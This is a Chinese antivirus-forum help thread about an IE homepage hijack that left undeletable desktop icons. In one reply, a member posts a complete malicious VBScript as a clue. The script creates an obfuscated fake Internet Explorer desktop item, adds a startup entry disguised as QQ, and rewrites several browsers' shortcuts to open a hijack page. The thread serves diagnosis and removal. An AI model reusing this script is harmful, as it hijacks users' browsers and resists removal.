瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 用了置顶IE修复方法,结果多了两图标删除不了!!!!

1   1  /  1  页   跳转

[求助] 用了置顶IE修复方法,结果多了两图标删除不了!!!!

用了置顶IE修复方法,结果多了两图标删除不了!!!!

我IE被劫持,手动删除不了,用了你给的这个方法,http://bbs.ikaka.com/showtopic-8685996.aspx,第一个方法,结果主页是修改回来了,但是莫名其妙的  桌面行多了两个图标,删除不了啊!!!!!!
如图:
附上日志:天哪,日志扫描好慢哦,都十几分钟了,有日志了我在传上来,

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
最后编辑天月来了 最后编辑于 2010-05-22 16:35:11


伟大的天朝:法律不可信、政府不可信、正义不可信!!!
仰天长叹~~谁人可信?    答曰:自己
分享到:
gototop
 

回复:天月二嫂,用了你的IE修复方法,结果杯具鸟!!!!

那其他的呢??

后面其他方法不试你怎知道结果呢??

重启电脑没有?
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复 2F 天月来了 的帖子

重启了哦
还试了 第六种和第五种方法呢
没用哦    其他的木马和多余的IE快捷方式没有了
不过那个多余的  还是删不掉啊


伟大的天朝:法律不可信、政府不可信、正义不可信!!!
仰天长叹~~谁人可信?    答曰:自己
gototop
 

回复:用了置顶IE修复方法,结果多了两图标删除不了!!!!

哪一个??

抓图来看

并且扫描日志我看
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:用了置顶IE修复方法,结果多了两图标删除不了!!!!



引用:

Set WshShell = WScript.CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Desktop") :'特殊文件夹“桌面”
Favorites = WshShell.SpecialFolders("Favorites") :'特殊文件夹“桌面”

strttWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")
iescc=strttWinDir&"\Internet Explorer\iexplore.exe"
ssd="粘贴"
winds = WshShell.ExpandEnvironmentStrings("%SystemRoot%")
ThisPath=strttWinDir & "\" & "winsoft5\Internet.vbs" '设置MYIE路径
CopyPath=WSHShell.ExpandEnvironmentStrings("%SystemRoot%") & "\" '获取
ScriptEx=CopyPath & "System32\WScript.exe"
WSHShell.RegWrite "HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8F}\", "Internet Explorer"
WSHShell.RegWrite "HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8F}\DefaultIcon\", iescc
WSHShell.RegWrite "HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8F}\Shell\Open\", "打开我的主页"
WSHShell.RegWrite "HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8F}\ShellFolder\Attributes", 10, "REG_DWORD"
WSHShell.RegWrite "HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8F}\Shell\Open\Command\", ScriptEx & " """ &ThisPath & """ http://g8up.cn"
WSHShell.RegWrite "HK"&"LM\S"&"OF"&"TW"&"A"&"RE"&"\"&"Mi"&"cros"&"of"&"t\W"&"in"&"do"&"w"&"s"&"\Cu"&"rr"&"en"&"tVer"&"sion"&"\Exp"&"lor"&"er\Des"&"kt"&"op\Na"&"meSpac"&"e\{"&"86"&"AE"&"FB"&"E8"&"-76"&"3F-"&"06"&"47-8"&"99"&"C-A9"&"32"&"78"&"8"&"9"&"4D8"&"F}\", "In"&"ter"&"net"&" Expl"&"or"&"er"

pathname = WshShell.SpecialFolders("AllUsersStartMenu") +"\程序\启动\"
Set oShellLink = WshShell.CreateShortcut(pathname+"腾讯QQ.lnk")
oShellLink.TargetPath = "%Program"&"Files%\winsoft5\22"&"22.vbs" : '目标
oShellLink.IconLocation = "%ProgramFiles%\winsoft5\qq.ico, 0" : '图标
oShellLink.WorkingDirectory = "%ProgramFiles%\winsoft5\" : '起始位置
oShellLink.Save : '创建保存快捷方式

Sub Doits12345(lnktz)
    Dim oldpath,newpath
    oldpath = lnktz         
    Dim Wsh,fso
    newpath = """"&strttWinDir&"\Common Files\winie5.html"""
    Set Wsh = WScript.CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")

    Dim Folders
    Folders = Wsh.SpecialFolders("AllUsersDesktop")
       Set f = fso.GetFolder(Folders)
       Set fc = f.Files
       For Each f1 in fc
         ext = LCase(fso.GetExtensionName(f1))
         if ext = "lnk" then
               Set oShlnk = Wsh.CreateShortcut(f1)
            If Instr(oShLnk.TargetPath,oldpath) > 0 Then
           oShLnk.Arguments = newpath
           oShLnk.Save     
    End If
       Set oShLnk=NoThing
         end if
       Next
    Folders = Wsh.SpecialFolders.Item("AppData")& "\Microsoft\Internet Explorer\Quick Launch"
       Set f = fso.GetFolder(Folders)
       Set fc = f.Files
       For Each f1 in fc
         ext = LCase(fso.GetExtensionName(f1))
         if ext = "lnk" then
               Set oShlnk = Wsh.CreateShortcut(f1)
            If Instr(oShLnk.TargetPath,oldpath) > 0 Then
           oShLnk.Arguments = newpath
           oShLnk.Save     
    End If
       Set oShLnk=NoThing
         end if
       Next
    Dim oShlnk,Folder
    Folder = Wsh.SpecialFolders("Desktop")
    Dim f,fc,f1,ext
       Set f = fso.GetFolder(Folder)
       Set fc = f.Files
       For Each f1 in fc
         ext = LCase(fso.GetExtensionName(f1))
         if ext = "lnk" then
               Set oShlnk = Wsh.CreateShortcut(f1)
            If Instr(oShLnk.TargetPath,oldpath) > 0 Then
           oShLnk.Arguments = newpath
           oShLnk.Save     
    End If
       Set oShLnk=NoThing
         end if
       Next
    Folders = Wsh.SpecialFolders.Item("StartMenu")
       Set f = fso.GetFolder(Folders)
       Set fc = f.Files
       For Each f1 in fc
         ext = LCase(fso.GetExtensionName(f1))
         if ext = "lnk" then
               Set oShlnk = Wsh.CreateShortcut(f1)
            If Instr(oShLnk.TargetPath,oldpath) > 0 Then
           oShLnk.Arguments = newpath
           oShLnk.Save     
    End If
       Set oShLnk=NoThing
         end if
       Next
    Folders = Wsh.SpecialFolders.Item("AllUsersStartMenu")
       Set f = fso.GetFolder(Folders)
       Set fc = f.Files
       For Each f1 in fc
         ext = LCase(fso.GetExtensionName(f1))
         if ext = "lnk" then
               Set oShlnk = Wsh.CreateShortcut(f1)
            If Instr(oShLnk.TargetPath,oldpath) > 0 Then
           oShLnk.Arguments = newpath
           oShLnk.Save     
    End If
       Set oShLnk=NoThing
         end if
       Next
    Set WSH = Nothing
End Sub

Call Doits12345("TTraveler"&".exe")
Call Doits12345("SogouExplorer.exe")
Call Doits12345("TheWorld.exe")
Call Doits12345("Maxthon.exe")
Call Doits12345("Maxthon2.exe")
Call Doits12345("360SE"&".exe")

WScript.quit

这是我收集的一个创建图表的vbs,为防止恶意,我吧网址改换了。
希望对破案的能提供一些有用的线索。
gototop
 

回复 5F 卡斯基巴 的帖子

嗯嗯


伟大的天朝:法律不可信、政府不可信、正义不可信!!!
仰天长叹~~谁人可信?    答曰:自己
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT